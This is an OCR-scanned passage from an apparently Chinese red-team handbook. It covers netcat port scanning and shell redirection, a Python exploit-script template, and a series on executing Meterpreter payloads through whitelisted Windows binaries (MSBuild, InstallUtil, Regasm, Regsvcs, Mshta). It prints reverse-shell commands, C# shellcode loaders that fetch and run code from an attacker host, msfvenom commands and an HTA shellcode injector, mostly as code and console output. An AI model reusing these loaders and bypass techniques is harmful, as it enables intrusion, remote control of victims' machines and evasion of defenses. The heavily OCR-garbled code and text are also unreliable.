-0 < 输出 文件 > 指定 文件 名 称 ， 把 往来 传输 的 数据 以 16 进 制 字 码 倾倒 成 该 文件 保存 ， 

-p < 通信 端口 > 设置 本 地 主机 使 用 的 通信 端口 ; 

aly 随机 指定 本 地 与 远 端 主机 的 通信 端口 ; 

-5 < 来 源 位 址 > 设置 本 地 主机 送出 数据 包 的 IP 地 址 ; 

-u 使 用 UDP 传输 协议 ; 

IV 显示 指令 执行 过 程 ; 

-w < 超时 秒 数 > 设置 等 待 连 线 的 时 间 ; 

-2 使 用 0 输入 /输出 模式 ， 只 在 扫描 通信 端口 时 使 用 。 
一 、 端 口 扫描 


nC -v -zn 192.168.163.135 1-1024 TCP 扫 描 
ПС -v -znu 192.168.163.135 1-1024 UDP 扫描 
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:-# nc -v -zn 192.168.163.136 1-1024 
(UNKNOWN) [192.168. .130] 445 (microsoft-ds) open 
(UNKNOWN) [192.168. .130] 139 (netbios-ssn) open 


(UNKNOWN) [192.168.163.130] 135 (epmap) open 
(UNKNOWN) [192.168.163.130] 81 (?) open 

(UNKNOWN) [192.168.163.136] 86 (http) open 

二 、 实 时 传输 nc 可 以 在 两 台 机 器 之 间 相 互 传递 信息 ， 首 先 需 
一 台 以 连接 的 方式 去 连接 其 指定 的 端口 。 





E 
8 
T 
n 
> 
% 
5 
E 


root @kali: - 
: # nc 192.168.163.130 6666 





us 管理 员 : C:\Windows\system32\cmd.exe - пс -Ivvp 6666 


inverse host lookup failed: h errno 11004: NO бата 
connect to [192.168.163.130] from (UNKNOWN) [192.168.163.128] 37040: NO DATA 





{-# cat 1l.txt 
hello123456 
:-# nc 192.168.163.130 6666 < 1.txt 





管理 员 : C:\Windows\system32\cmd.exe 


C:\Users\Administrator\ne>ne -luup 6666 > 1.txt 

Listening on [anu] 6666 ... 

192.168.163.128: inverse host lookup failed: h errno 11004: NO_DATA 

connect to [192.168.163.130] from (UNKNOWN) [192.168.163.128] 37044: NO_DATA 
sent 0, rcud 12 


C:\Users\Administrator\nc>type 1.txt 
һе110123856 





=. R5¥shell 
1. 主动 连接 


nc -lvvp port 开启 监听 
nc ip port -e cmd 将 cmd 重 定向 到 连接 
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:-# nc -lvvp 6666 
listening on [any] 6666 ... 
192.168.163.130: inverse host lookup failed: Unknown host 
connect to [192.168.163.128] from (UNKNOWN) [192.168.163.130] 49169 
Microsoft Windows [9:3 6.3.9600] 
(c) 2013 Microsoft Corporation6fG66666666@E6666 


c:\Users\Administrator\nc>whoami 
whoami 
srv-web-kit\administrator 


c:\Users\Administrator\ncoff 





m Е: C:’\Windows\system32\cmd.exe - пс 192.168.163.128 6666 -e cmd 
C:\Users\Administrator\ne>ne 192.168.163.128 6666 -e cmd 





. 被 动 连接 





nc -lvvp port -c /bin/bash 开启 监听 并 执行 bash 
пс ip port 连接 


: nc -lvvp 6666 -c /bin/bash 
listening on [any] 6666 ... 
192.168.163.130: inverse host lookup failed: Unknown host 
connect to [192.168.163.128] from (UNKNOWN) [192.168.163.130] 49171 





m 管理 员 : C:\Windows\system32\cmd.exe - пс 192.168.163.128 6666 ex [=|9 
C:\Users\Administrator\ne>ne 192.168.163.128 6666 


uname -a 
Linux kali 5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kalil (2019-12-09) x86_64 GNU/Linux 
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五 分 钟 快速 编写 漏洞 EXP 
0x01 头疼 的 开始 


因为 每 周 都 要 验证 APT 探 针 的 攻击 流量 ， 可 是 探 针 事件 巨 多 ， 好 多 都 是 误 报 ， 所 以 遇见 比较 多 的 都 是 一 个 - 
b 


0x02 EXP 模 板 下 载 


EXP 模 板 地 址 如 下 : 





链接 : 
提取 码 : mOee 


0x03 模板 介绍 


此 代码 模板 用 于 编写 漏洞 检测 及 攻击 脚本 ， 此 脚本 包含 以 下 几 个 漏洞 检测 模块 。 


.主机 存活 检测 ; 





单纯 使 用 ping 检 测 ， 所 以 检测 的 可 靠 性 并 没有 那么 强 ， 如 果 对 于 检测 要 求 比较 高 ， 可 不 使 用 此 方 
法 ， 此 模块 很 鸡肋 ! ! 


.扫描 结果 存储 : 
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会 将 扫描 结果 存储 到 EXP 脚 本 同 目 录 的 一 个 文件 内 ， 需 要 使 用 者 提供 保存 结果 的 文件 名 ， 脚 本 检测 
不 存在 会 直接 创建 ， 写 入 方式 为 往 文件 内 增加 结果 ， 并 不 会 覆盖 之 前 的 结果 ， 如 果 你 想 覆 盖 之 前 的 
结果 ， 可 以 修改 此 处 的 打开 方式 ， 修 改 为 w+ 即 可 每 次 覆盖 内 容 。 


: 自 定义 head 头 


在 编写 某 些 EXP 时 ， 会 要 求 使 用 特定 的 请 求 头 ， 这 个 时 候 就 可 以 通过 自 定义 head 头 来 实现 


python . \pythonEXP 模 板 . p 





如 果 你 想 修改 此 界面 的 内 容 ， 可 直接 修改 代码 50、52、53 处 的 内 容 即 可 。 
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:脚本 帮助 信息 模块 


此 页 面 是 脚本 的 帮助 页 面 ， 一 般 不 用 修改 。 
‚ 结果 打印 模块 


此 模块 不 做 介绍 ， 都 是 print。 





.参数 处 理 





此 方法 为 整个 模板 的 核心 了 ， 此 方法 负责 调用 用 户 参 数 处 理 ， 方 法 调用 ，EXP 结 果 处 理 等 操作 
模块 分 为 三 个 部 分 : 
(一 ) 用 户 参 数 处 理 
(=) 单个 URL 检 测 


(=) Txt 文件 批量 检测 





0X04 你 使 用 此 模板 需要 做 的 


你 需要 做 的 很 简单 ， 在 下 面 红 色 方 框 内 加 入 自己 的 EXP 检 测 代码 ， 比 如 以 下 代码 ， 你 只 需要 增加 一 
个 paylaod， 然 后 请 求 判断 一 下 返回 包 内 是 否 有 你 的 就 可 以 了 。 


你 做 的 仅仅 需要 增加 一 个 exp 核 心 代码 ， 其 他 都 已 经 提前 准备 好 了 ， 本 人 使 用 此 模板 最 快 编写 一 个 
检测 脚本 用 时 8 分 钟 ， 包 括 搭建 漏洞 环境 。 





ЖЕ: 漏洞 存在 返回 为 "Vulnerability is exist"， 漏 洞 不 存在 就 没有 那么 重要 了 。 
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O Event tog 


5” 


然后 修改 此 代码 模板 的 名 字 


0X05 模板 功能 演示 


.批量 检测 





-打开 url.txt 里 面 的 url 进 行 批 量 检 测 


-p: 进 行 主机 存活 检测 


-S; 结 果 保 存 为 utl.txt 





utl.txt 文 件 如 下 
出 现 的 都 是 False 是 因为 主机 检测 不 存活 
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http://21 






Е 


EXP 后 门 文 件 :No 
检测 时 间 :Tue Dec 31 11:05:28 2019 





http://2 
http://120 

检测 结果 :Vulnerability is exist! 

二 机 存活 :True 

EXP 后 门 文件 :No 

检测 时 间 :Tue Dec 31 11:05:36 2019 
:单个 url 检 测 





-U: 指 定 url 


-S: 文 件 保存 至 utl.txt 


https://www.baidu.com 
$355: Vulnerability is not exist! 
主机 存活 :Host survival decection is not enabled 
EXP 后 门 文 件 :No 
爹 测 时 间 :Tue Dec 31 13:35:08 2019 
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第 十 一 章 红 队 技巧 
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基于 白 名 单 Msbuild.exe 执 行 payload 第 一 季 


MSBuild 简 介 : 


MSBuild 是 Microsoft Build Engine 的 缩写 ， 代 表 Microsoft 和 Visual Studio 的 新 的 生成 平台 。 
MSBuild 在 如 何 处 理 和 生成 软件 方面 是 完全 透明 的 ， 使 开发 人 员 能 够 在 未 安装 Visual Studio 的 生成 
实验 室 环境 中 组 织 和 生成 产品 。 

MSBuild 引入 了 一 种 新 的 基于 XML 的 项 目 文件 格式 ， 这 种 格式 容易 理解 、 易 于 扩展 并 且 完 全 受 
Microsoft 支持 。MSBuild 项 目 文件 的 格式 使 开发 人 员 能 够 充分 描述 哪些 项 需要 生成 ， 以 及 如 何 利用 
不 同 的 平台 和 配置 生成 这 些 项 。 


说 明 : Msbuild.exe 所 在 路 径 没 有 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，Msbuild 命 令 无 法 识别 。 
基于 白 名 单 MSBuild.exe 配 置 payload: 


Windows 7 默认 位 置 为 : 


C:\Windows\Microsoft,NET\Framework\v4.0,30319\msbuild,.exe 


攻击 机 : 192.168.1.4 & Debian 
ЛЛ: 192.168.1.3 &Windows 7 


SERA: 


C: NWindowsMMicrosoft.NETNFrameworkNv4.0.30319Nmsbuild.exe Micropoor.xml 


SUC: \Windows Microsoft. NET! 


ers \John\Desk тор (274 Vw ndowsNMicrosoft.NETXFr amework v4.0. 30319 Xm: 


2.0 
30319.42000] 
保留 所 有 权利 ， 








配置 攻击 机 msf: 
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exploit(rulti:! ler) » show options 


Module options (exploit/multi/handler) 


ayload options (windows /meterpreter/reverse tcp) 


Name Current tting Required Description 


EXITFUNC 5 Exit technique (Accepted ' seh, thread. process, none) 
LHOST С 4 listen address 
LPORT 3 yes The listen port 
Exploit target 
Id Name 


0 Wildcard Target 
msf exploit(rulti handler) » exploit 


Sending stage 
Sleeping bef 16 
erpreter se оп 3 opened (192 4:53 -» 192 3 t 2019-01-14 23; 35:09 -0500 


meterpreter > getuid 


Server username: John-PC\John 





附录 : Micropoor.xml 
it: x86 payload 
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“есе ToolsVersion="4.0" xmlnsz"http://schemas, micros Коош 
K: \Windows\Microsoft .NET\Framework\v4.0. 30319\msbuild. exe SimpleTasks. csprc 
«Target Name-"iJEKHyTEjyCU"» 
Р «xUokfh /» 
</Target> 
<UsingTask 
TaskNamez"xUokfh" 
TaskFactoryz"CodeTaskFactory" 
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsof 
<Task> 


<Code Type="Class" Language="cs"> 

<! [CDATA[ 
j using System; using System.Net; using System.Net.Sockets; using System.L 
public class xUokfh : Task, ITask í 
4 [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 
[D1lImport("kerne132")]private static extern IntPtr CreateThread(UInt32 qEVoJxkr 
 [DllImport("kerne1l32")] private static extern UInt32 WaitForSingleObject(IntPtr 
static byte[] VYcZlUehuq(string IJBRrBqhigjGAx, int XBUCexXIrGIEpe) { 
| IPEndPoint DRHsPzS = new IPEndPoint(IPAddress.Parse(IJBRrBqhigjGAx), XBUCexx 
Socket zCoDOd = new Socket(AddressFamily.InterNetwork, SocketType.Stream, Pr 
try { zCoDOd.Connect(DRHsPzS); } 
catch { return null;) 
byte[] OCrGofbbWRVsFEl = new byte[4]; 
zCoDOd.Receive(OCrGofbbWRVsFEl, 4, 0); 
int auQJTjyxYw = BitConverter.ToInt32(O0CrGofbbWRVsFEl, 0); 
byte[] MlhacMDOKUAfvMX = new byte[auQJTjyxYw + 5]; 
int GFtbdD - 0; 
while (GFtbdD < auQJTjyxYw) 
( GFtbdD += zCoDOd.Receive(MlhacMDOKUAfvMX, GFtbdD + 5, (auQJTjyxYw - GFtbdE 
byte[] YqBRpsmDUT - BitConverter.GetBytes((int)zCoDOd.Handle); 
Array.Copy(YqBRpsmDUT, 0, MIhacMDOKUAfvMX, 1, 4); MlhacMDOKUAfvMX[0] = OxBF; 
return MlhacMDOKUAf vMXx; } 
Static void NkoqFHncrcX(byte[] qLAvbAtan) { 

if (qLAvbAtan !- null) 4 

UInt32 jrYMBRkOAnqTqx = VirtualAlloc(0, (UInt32)qLAvbAtan.Length, 0x100¢ 
Marshal.Copy(qLAvbAtan, 0, (IntPtr)(jrYMBRkOAnqTqx), qLAvbAtan.Length); 
IntPtr WCUZoviZi - IntPtr.Zero; 
UInt32 JhtJOypMKo - 0; 
IntPtr UxebOmhhPw - IntPtr.Zero; 
WCUZoviZi = CreateThread(0, ©, jrYMBRkOAnqTqx, UxebOmhhPw, 0, ref JhtJOy 
WaitForSingleObject(WCUZoviZi, OxFFFFFFFF); }} 


public override bool Execute() 


t 
byte[] uABVbNXmhr = null; uABVbNXmhr = VYcZlUehuq( "192.168.1.4", 53); 
NkoqFHncrcX(uABVbNXmhr ) ; 
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return true; 
11> 
«/Code» 
</Task> 
</UsingTask> 
</Project> 
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基于 白 名 单 Installutil.exe 执 行 payload 第 二 季 


Installutll 简 介 : 


Installer 工 具 是 一 个 命令 行 实用 程序 ， 人 允许 您 通过 执行 指定 程序 集中 的 安装 程序 组 件 来 安装 和 和 弛 载 服 
务 器 资源 。 此 工具 与 System,Configuration.Install 命 名 空间 中 的 类 一 起 使 用 。 


具体 参考 : Windows Installer 部 署 


说 明 : Installutil,exe 所 在 路 径 没 有 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，lnstallutil 命 令 无 法 识别 。 
基于 白 名 单 installutil.exe 配 置 payload: 


Windows 7 默认 位 置 : 


C: NindowsMMicrosoft.NETNFrameworkNv4.0.30319NInstallUtil.exe 


攻击 机 : 192.168.1.4 & Debian 
靶 机 : 192.168.1.3 &Windows 7 


配置 攻击 机 msf : 


пе? exploit(rulti handler) > show options 
Module options (ex ploit/mul tishandler): 


Name Current Setting Required D 


Payload options (windows /x64/meterpreter/reverse_tcp): 


Name Current Setting Required Description 


X Exit technique (Accepted: '', seh, thread, process, none} 
LHOST 92. 24 The listen address 


LPOR 3 The listen port 


Exploit target: 
Id Name 


O Wildcard Target 


xPloit{multi- handler) > exploit 


М Started reverse TCP handler on 192.168.1,4:53 





靶 机 执行 : 
SUE gx : 


C:\Windows\Microsoft .NET\Framework64\v4.0.30319\csc.exe /r:System.Ent 
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АТАШ» ТЕ 


di 


as part of the Microsoft x у .MET Frame but en 
up to - # 5, which is no longer the latest vers om Fo 
nk ID= 4 














payload: Micropoor.exe 


Micropoor 
e 


靶 机 执行 : 


C: NindowsNMicrosoft.NETNFramework64Nv4.0.30319NInstallUtil.exe /logfile- /LogTc 


asf exploit(cult 


Started reverse TCP han 

Sending stage (206403 byt 

Sleeping before handling : З 

Meterpreter session 8 opened (192,168 .1.4:53 -> 192.168.1.3:18811)1!at 2019-01-15 07:03:32 -0500 


l 
] 
1 
1 


meterpreter > getuid 

Server username: John-PC\John 
meterpreter > getpid 

Current pid: 10224 
meterpreter > ifconfig 


Interface 

Name 

Hardware MAC ; 

MTU : 4294967295 

IPv4 Address : 7.0.0.1 

IPv4 Netmask : 255,0.0.0 

IPv6 Address ; ::1 
ОРЕ ffff: ftft: ff ff 


: : Intel(R) Ethernet 
Hardware MAC : 4с:сс:ба:е3:51:27 
MTU - 

IPv4 Addres 
ІРу4 Netmask 7 
IPv6 Address : feB0: ns 7c8: d463: 


附录 : Micropoor.cs 
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A 


" 


a 


using System; using System.Net; using System.Ling; using System.Net.Sockets; usi. 


{{ MessageBox.Show("doge"); Console.ReadLine();}} 


[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 GDmElass 
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr 
static byte[] ErlgHH(string ZwznjBJY, int KsMEeo) ( 


static void cmMtjerv(byte[] HEHUjJhkrNS) í 





public class GQLBigHgUniLuVx { 
public static void Main() 


t 


while(true) 


} 


[System.ComponentModel.RunInstaller(true)] 
public class esxwUYUTWShqw : System.Configuration.Install.Installer 
{ 
public override void Uninstall(System.Collections.IDictionary zWrdFAUHmL 


t 
jkmhGrfzsKQeCG.LCIUtRN(); 


public class jkmhGrfzsKQeCG 
í [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(L 


IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEe 
Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stree 
try 4 XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); } 

catch { return null;} 

byte[] UmquAHRnhhpuE - new byte[4]; 

XXxIoIXNCle.Receive(UmquAHRnhhpuE, 4, 0); 

int kFVRSNnpj - BitConverter.ToInt32(UmquAHRnhhpuE, 0); 

byte[] qaYyFq = new byte[kFVRSNnpj + 5]; 

int SRCDELibA 0; 

while (SRCDELibA « kFVRSNnpj) 

( SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA + 5, (kFVRSNnpj - SRCDE 
byte[] TvvzOgPLqwcFFv = BitConverter,GetBytes((int)XXxIoIXNCle.Handle); 
Array.Copy(TvvzOgPLqwcFFv, 0, qaYyFq, 1, 4); qgaYyFq[0] = OxBF; 

return даууға;) 


I! 


if (HEHUjJhkrNS != null) 4 
UInt32 WcpKfU = VirtualAlloc(0, (UInt32)HEHUjJhkrNS.Length, 0х1000, 0х46 
Marshal.Copy(HEHUjJhkrNS, ©, (IntPtr)(WcpKfU), HEHUjJhkrNS.Length); 
IntPtr UhxtIFnlOQatrk = IntPtr.Zero; 
UInt32 wdjYKFDCCf - 9; 
IntPtr XVYcQxpp - IntPtr.Zero; 
UhxtIFnlOQatrk = CreateThread(0, 0, WcpKfU, XVYcQxpp, 0, ref wdjYKFDCCf) 
WaitForSingleObject(UhxtIFnlOQatrk, OxFFFFFFFF); }} 


public static void LCIUtRN() £ 
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byte[] IBtCWU - null; IBtCWU - ErlgHH("192.168.1.4", 53); 
cmMtjerv(IBtCWU); ap O- NR > - 
} } 
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基于 白 名 单 regasm.exe 执 行 payload 第 三 季 


Regasm 简 介 : 


Regasm 为 程序 集注 册 工 具 ， 读 取 程 序 集 中 的 元 数据 ， 并 将 所 需 的 项 添加 到 注册 表 中 。RegAsm.exe 
是 Microsoft Corporation 开 发 的 合法 文件 进程 。 它 与 Microsoft.NET Assembly Registration Utility 相 
关联 。 


说 明 : Regasm.exe 所 在 路 径 没有 被 系统 添加 PATH 环 境 变 量 中 ， 因 此 ，REGASM 命 令 无 法 识别 。 


具体 参考 微软 官方 文档 : 





基于 白 名 单 Regasm.exe 配 置 payload: 


Windows 7 默认 位 置 : 


C:\Windows\Microsoft,NET\Framework\v4.,0,30319\regasm.exe 


攻击 机 : 192.168.1.4 & Debian 
靶 机 : 192.168.1.3 & Windows 7 


配置 攻击 机 msf: 


Y 


msf exploiti(multi handler) > show options 


Module options (explolt/multi/handler) 


Payload options (windows/meterpreter/rewerse tcp): 
Name Current Setting Required Description 
seh, thread, process, none) 
LHOST 192.1 
LPORT 53 yes Тһе listen port 
Exploit target: 
Id Name 


0 Wildcard Target 


nsf exploitimulti handler) > exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 





靶 机 执行 : 
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¢:\Windows\Microsoft .NET\Framework\v4.0.30319\regasm.exe /U Місгороог.411 


{в pl o1 t (1 


| Started reverse TCP handler on 192.16: 
Sending stage (179779 bytes) to 192 
ng b re handling stage.. 
Meterpreter session 11 opened (192.168.1.4:53 -» 


192.168.1.3:21277) at 2019-01-15 09 
» getuid 
sername: John-PC\John 
erpreter » getpid 
Jrrent pid: 9956 
erpreter > [J 





附录 : Micropoor.cs 


注 : x86 payload 
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using System; using System.Net; using System.Ling; Using System.Net.SoCkets; us, 


namespace HYlDKsYF 
( 


public class kxKhdVzWQXolmmF : 


ServicedComponent 1 


public kxKhdVzWQXolmmF() { Console.WriteLine("Micropoor"); ) 


[ComRegisterFunction] 


public static void RegisterClass ( string pNNHrTZzW ) 


( 


ZApOAKJKY . QYJOTklTwn(); 


[ComUnregisterFunction] 


public static void UnRegisterClass ( string pNNHrTZzW ) 


( 


ZApOAKJKY .QYJOTklTwn(); 


public class ZApOAKJKY 


{ [DllImport("kernel32")] private static extern UInt32 HeapCreate(UIr 


[DllImport("kernel32")] private 
[DllImport("kernel32")] private 
[DllImport("kernel32")] private 
[Dllimport("kernel32")] private 


static 
static 
static 
static 


extern UInt32 HeapAlloc(UInt32 bqtaDNfVCz 
extern UInt32 RtlMoveMemory(UInt32 AQdEyC 
extern IntPtr CreateThread(UInt32 uQgiOlr 
extern UInt32 WaitForSingleObject(IntPtr 


IPEndPoint YUXVAnzAurxH = new IPEndPoint(IPAddress.Parse(aCwwUttzmy), iJGvqi 
Socket MXCEuiuRIWgOYze = new Socket(AddressFamily.InterNetwork, SocketType.* 
try { MXCEuiuRIWgOYze.Connect(YUXVAnzAurxH); } 


catch ( return null;j 


byte[] Bjpvhc - new byte[4]; 


MXCEuiuRIWgOYze.Receive(Bjpvhc, 4, 0); 
int IETFBI - BitConverter.ToInt32(Bjpvhc, 0); 
byte[] ZKSAAFwxgSDnTW = new byte[IETFBI + 5]; 


int JFPJLlk = 0; 
while (JFPJLlk < IETFBI) 


{ JFPJLIk += MXCEuiuRIWgOYze.Receive(ZKSAAFwxgSDnTW, 2ЕРЛІК + 5, (IETFBI - 
byte[] nXRztzNVwPavq = BitConverter.GetBytes((int)MXCEuiuRIWgOYze.Handle); 
Array.Copy(nXRztzNVwPavq, 0, ZKSAAFwxgSDnTW, 1, 4); ZKSAAFwxgSDnTW[0] = OxBF 
return ZKSAAFwxgSDnTW; } 


static void TOdKEwPYRUgJly(byte[] KNCtlJwAmlqJ) 5 





if (KNCtlJWAmlqJ != null) { 
UInt32 uuKxFZFwog = HeapCreate(0x00040000, (UInt32)KNCtlJWAmlqJ.Length, € 
UInt32 sDPjIMhJIOAlwn = HeapAlloc(uuKxFZFwog, 0x00000008, (UInt32)KNCtlJ^ 
RtlMoveMemory(sDPjIMhJIOAlwn, KNCtlJWAmlqJ, (UInt32)KNCt1JWAmlqJ.Length); 
UInt32 ijifOEfllRl - 0; 
IntPtr ihXuoEirmz = CreateThread(0, ©, sDPjIMhJIOAlwn, IntPtr.Zero, 0, гє 
WaitForSingleObject(ihXuoEirmz, OxFFFFFFFF) ; }} 
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| public static void QYJOTklTwn() { сето ``» 


byte[] ZKSAAFwxgSDnTW = null; ZKSAAFwxgSDnTW = HMSjEXjuIzkkmo("192.168.1.4", 
TOdKEwPYRUgJ1ly(ZKSAAFwxgSDnTW) ; 


) 3 "3 
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基于 白 名 单 regsvcs.exe 执 行 payload 第 四 季 


Regsvcs 简 介 : 
Regsvcs 为 .NET 服 务 安装 工具 ， 主 要 提供 三 类 服务 : 
。 加 载 并 注册 程序 集 。 
。 生成 、 注 册 类 型 库 并 将 其 安装 到 指定 的 COM+ 1.0 应 用 程序 中 。 
。 配置 以 编程 方式 添加 到 类 的 服务 。 
说 明 : Regsvcs.exe 所 在 路 径 没 有 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，Regsvcs 命 令 无 法 识别 


具体 参考 微软 官方 文档 : 


基于 白 名 单 Regsvcs.exe 配 置 payload : 


windows 7 默认 位 置 : 


C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 


攻击 机 : 192.168.1.4 &Debian 





#24: 192.168.1.3 &Windows 7 


配置 攻击 机 msf: 
msf explolt(multi'handler) > show options 
Module options (exploit/multihandler)}. 


Name Current Setting Required Description 


Payload options (windows /meterpreter/res NOE 
Name Current Setting Required Description 
EXITFUNC pr Exit technique (Accepted: '', seh, thread, process, none) 
LHOST 192.168.1.4 The listen address 
LPORT 53 yes The listen port 
Exploit target: 
Id Name 


0 wildcard Target 


f exploit(nulti;handler) > exploit 


[^] Started reverse TCP handler on 192.168.1:4:53 
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靶 机 执行 : 


C: NindowsNMicrosoft.NETNFrameworkNv4.0.30319Nregsvcs.exe Micropoor.dll 


mst e plait (1 ult isha ет ү E exploit 


«] 

+] Sending stage (1 i 

] Sleeping before handlin 
1 Meterpreter s on 12 


2019-01-15 09:45 


username: John-PC\John 
eter > qetpid 

rent pid: 2 

rpreter 





附录 : Micropoor.cs 


注 : x86 payload 
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жек, W , ” ? 
using System; using System.Net; using System.Ling; using System.Net.Sockets; 


namespace phwUgeuTRSqn 


public class mfBxqerbXgh : ServicedComponent { 


public mfBxqerbXgh() { Console.WriteLine("Micropoor"); } 


[(ComRegisterFunction] 


public static void RegisterClass ( string DssjWsFMnwwXL ) 


UXsiCEXRzLNKkI.BBNSohgZXGCaD( ) ; 


[ComUnregisterFunction] 








public static void UnRegisterClass ( string 0ssjWsFMnwwXL ) 


uXsiCEXRzLNKI .BBNSohgZXGCaD( ) ; 


public class uXsiCEXRZLNkI 





1 [DllImport("kernel32")] private static extern UInt32 HeapCreate(UIr 
[Dllimport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 yjmmncJHBr 


[DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 PorEix 
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[DllIimport("kernel32")] private static extern IntPtr Createrhread(UInt32 WNvQyYv 
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr 
IPEndPoint hqbNYMZQr = new IPEndPoint(IPAddress.Parse(MKwSjIxqTXxxEO), jVaXWF 
Socket LbLgipot - new Socket(AddressFamily.InterNetwork, SocketType.Stream, 
try 5 LbLgipot.Connect(hqbNYMZQr); ) 
catch { return null;} 
byte[] VKQsLPgLmVdp = new byte[4]; 
LbLgipot.Receive(VKQsLPgLmVdp, 4, 0); 
int jbQtneZFbvzK = BitConverter.ToInt32(VKQsLPgLmVdp, 0); 
byte[] cyDiPLJhiAQbw = new byte[jbQtneZFbvzK + 5]; 
int vyPloXEDJoylLbj = 0; 
while (vyPloXEDJoylLbj « jbQtneZFbvzK) 
{ vyPloXEDJoylLbj += LbLgipot.Receive(cyDiPLJhiAQbw, vyPloXEDJoylLbj + 5, (j 
byte[] MkHUcy - BitConverter.GetBytes((int)LbLgipot.Handle); 
Array.Copy(MkHUcy, ©, cyDiPLJhiAQbw, 1, 4); cyDiPLJhiAQbw[0] = OxBF; 
return cyDiPLJhiAQbw; } 
“static void ZFeAPdN(byte[] hjErkNfmkyBq) { 
if (hjErkNfmkyBq != null) { 
UInt32 xYfliOUgksPsv = HeapCreate(0x00040000, (UInt32)hjErkNfmkyBq.LengtF 
UInt32 eSiulXLtqQO = HeapAlloc(xYfliOUgksPsv, 0x00000008, (UInt32)hjErkNf 
RtlMoveMemory(eSiulXLtqQO, hjErkNfmkyBq, (UInt32)hjErkNfmkyBq.Length) ; 
UInt32 NByrFgkjVjB = 0; 
IntPtr PsIqQCvc = CreateThread(0, 0, eSiulXLtqQO, IntPtr.Zero, 0, ref NBy 


WaitForSingleObject(PsIqQCvc, OxFFFFFFFF);)) 
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public static void BBNSohgZXGCaD() { 
byte[] cyDiPLJhiAQbw = null; cyDiPLJhiAQbw = SVMBrK("192.168.1.4", 53); 


ZFeAPdN ( cyDiPLJhiAQbw); 


ж 
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基于 白 名 单 Mshta.exe 执 行 payload 第 五 季 


£= 人 


Mshtata]7 r : 


Mshta.exe 是 微软 Windows 操 作 系 统 相关 程序 ， 英 文 全 称 Microsoft HTML Application, 61823379 fni 
软 超 文 本 标记 语言 应 用 ， 用 于 执行 .HTA 文 件 。 


说 明 : Mshta 所 在 路 径 已 被 系统 添加 PATH 环境 变量 中 ， 因 此 ， 可 直接 执行 Mshta.exe 命 令 。 
基于 白 名 单 Mshta.exe 配 置 payload : 


Windows 7 默认 位 置 : 


C:MWindowsNSystem32Nmshta.exe 


C:NWindowsNSyswOW64Nmshta.exe 


攻击 机 : 192.168.1.4 & Debian 
ШЛ: 192.168.1.3 & Windows 7 


配置 攻击 机 msf: 
ї е) ploit inulti: handler ) » show options 
Module options (exploit/multi handler) 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse tcp): 
Name Current Setting Required Description 
Exit technique (Accepted: '', seh, ; oce none} 


The listen addr (ап interface may be specified) 
The listen port 


011 target: 
Id Name 


Ə Wildcard Target 


nst exploit (multivhandler) > exploit 


i Started reverse TCP handler on.192.168;1,4:53 





BCS payload: 
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msfvenom -a x86 --platform windows -p windows/meterpreter/reverse tcp LHOST-192. 








cat shellcode.bin |base64 -w 0 





v Var M html 


替换 如 下 : 





Dim code ; code = "TVroAAAAAFTSRVWJSYHDCOAAAP /TicNX 


靶 机 执行 : 


mshta.exe http://192.168.1.4/Micropoor.hta 


Е exploit (multi‘handler} > exploit 





Started reverse TCP handler on 192,168.1.4:53 
Sending stage (179779 bytes) to ‚168. 
Meterpreter n 5 opened (192,168.1,4:53 -> 192.168.1.3:16475) at 2019-01-16 00:59: 


meterpreter > getuid 

Server username; John-PC\John 
meterpreter > getpid 

Current pid: 5436 

meterpreter > (| 





С: \Users\Johnomshta.exe http:// .158.1.4/CACTUSTORCH.hta 





附录 : Micropoor.hta 





注 : x86 payload 
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7 " LIT ` v қ “” 27 - 
<script language="VBScript"> 


q Usage: 

1 Choose a binary you want to inject into, default "rundll32.exe", you can use г 
_' Generate а 32 bit raw shellcode in whatever framework you want. Tested: Cobalt 
x Run: cat payload.bin | base64 -w 0 


1 Copy the base64 encoded payload into the code variable below. 


1 Replace with binary name that you want to inject into. This сап be anything tt 


"Dim binary : binary = "rundll32.exe" 


im code : code = "/OiCAAAAYInlMCBkilAwii1IMi1IUi3IOD7dKJjH/rDxhfAISIMHPDQHHAv JSV 


ib Debug(s) 

] Sub 

üb SetVersion 

х Sub 

р tion Base64ToStream(b) 

enc, length, ba, transform, ms 


Set enc = Createobject("System. Text .ASCIIEncoding") 
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length - enc.GetByteCount 2(b) қ 4 : 






Set transform = CreateObject("System.Security.Cryptography.FromBase64Transforg 
Set ms - CreateObject("System.IO.MemoryStream") 

ms.Write transform.TransformFinalBlock(enc.GetBytes 4(b), 9, length), ©, ((ler 
ms.Position - 0 

Set Base64ToStream - ms 


End Function 


Sub Run 

Dim s, entry class 
S = "AAEAAAD/ / / / / AQAAAAAAAAAEAQAAAC JTeXNOZWOUuRGVsZWdhdGVTZXJpYWxpemFOaW9uSG9 sZGv 
S = s & "AwAAAAhEZWX1Z2FOZQdOYXJnZXQwB211dGhvZDADAwMwU31zdGVtLKkRl1bGVnYXRlU2VyaWF 
S = s & "dGlvbkhvbGRlcitEZWX1lZ2F0ZUVudHJ5IlN5C3RlIbS5EZWXx1Z2FOZVNlcmlhbGl6YXRpb25 
5 = s & "ZXIVvU31zdGVtL1JlzmxlY3Rpb24uTWVtYmVySW5mbi1NlcmlhbGl6YXRpb25Ib2xkZXIJAg^ 
S = 5 8 "AAAACQQAAAAEAgAAADBTeXNOZWOURGVsZWdhdGVTZXJpYWxpemF8aW9uSG9sZGVyKOR1bGV 
